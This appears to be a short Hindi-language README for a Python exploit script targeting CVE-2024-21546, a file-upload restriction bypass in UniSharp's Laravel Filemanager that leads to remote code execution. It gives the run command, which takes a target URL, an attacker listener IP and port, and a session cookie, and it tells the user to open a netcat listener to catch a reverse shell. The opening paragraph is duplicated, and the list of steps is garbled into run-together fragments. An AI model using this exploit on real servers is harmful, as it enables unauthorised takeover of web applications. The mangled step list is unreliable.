
यह Python एक्सप्लॉइट स्क्रिप्ट UniSharp द्वारा बनाए गए एक कमजोर Laravel Filemanager को लक्षित करती है, जो प्रमाणित उपयोगकर्ताओं को फ़ाइल प्रतिबंधों को बायपास करने और दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है। यह अपलोड किए गए पेलोड के ट्रिगर होने पर Remote Code Execution (RCE) का कारण बन सकता है।
यह पायथन एक्सप्लॉइट स्क्रिप्ट UniSharp द्वारा बनाए गए एक कमजोर Laravel Filemanager को लक्षित करती है, जो प्रमाणित उपयोगकर्ताओं को फ़ाइल प्रतिबंधों को बायपास करने और दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है। यह अपलोड किए गए पेलोड के ट्रिगर होने पर रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।
एक्सप्लॉइट निम्नलिखित कार्य करता है:
laravel_session को मान्य करता है_token निकालता हैसंस्करण 2.9.1 और उससे पहले के संस्करण
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
महत्वपूर्ण: स्क्रिप्ट चलाने से पहले अपना लिसनर शुरू करें:
nc -lvnp <listener_port>
